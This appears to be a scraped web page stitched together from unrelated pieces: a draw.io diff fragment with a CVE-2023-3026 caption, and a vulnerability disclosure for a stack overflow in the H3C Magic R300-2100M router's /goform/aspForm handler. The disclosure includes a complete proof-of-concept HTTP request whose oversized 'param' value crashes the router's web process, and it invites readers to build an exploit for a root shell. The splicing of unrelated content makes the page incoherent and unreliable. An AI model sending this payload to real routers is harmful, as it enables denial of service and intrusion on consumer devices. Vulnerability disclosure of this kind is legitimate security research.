document.body.appendChild(lightbox); document.body.appendChild(closeImg); if (container != null) { container.innerHTML \= ''; container.appendChild(lightbox); } else { document.body.appendChild(lightbox); document.body.appendChild(closeImg); }  
ui.setFileData(this.xml);  
Expand All @@ -2059,7 +2081,7 @@ GraphViewer.prototype.showLocalLightbox = function() ui.chromelessToolbar.style.zIndex \= this.lightboxZIndex;  
// Workaround for clipping in IE11- document.body.appendChild(ui.chromelessToolbar); (container || document.body).appendChild(ui.chromelessToolbar);  
ui.getEditBlankXml \= mxUtils.bind(this, function() { Expand Down

CVE-2023-3026: 21.2.8 release · jgraph/drawio@c7ac634

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/SJacutyr3.png) In the SetAPWifiorLedInfoById function, local variable v12 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/rJSsOFkrn.png) V8 can be controlled by attacker, entered as parameter 'param'. In line 23, v8 is formatted into v12 by function sscanf as long as the size of the data we enter until ';'. So when the size of the data we enter before ';' is larger than 36 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/rJekFFJH3.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 607 CMD=SetAPWifiorLedInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/S1yZtY1Sn.png) And you can write your own exp to get the root shell.

Tag

#js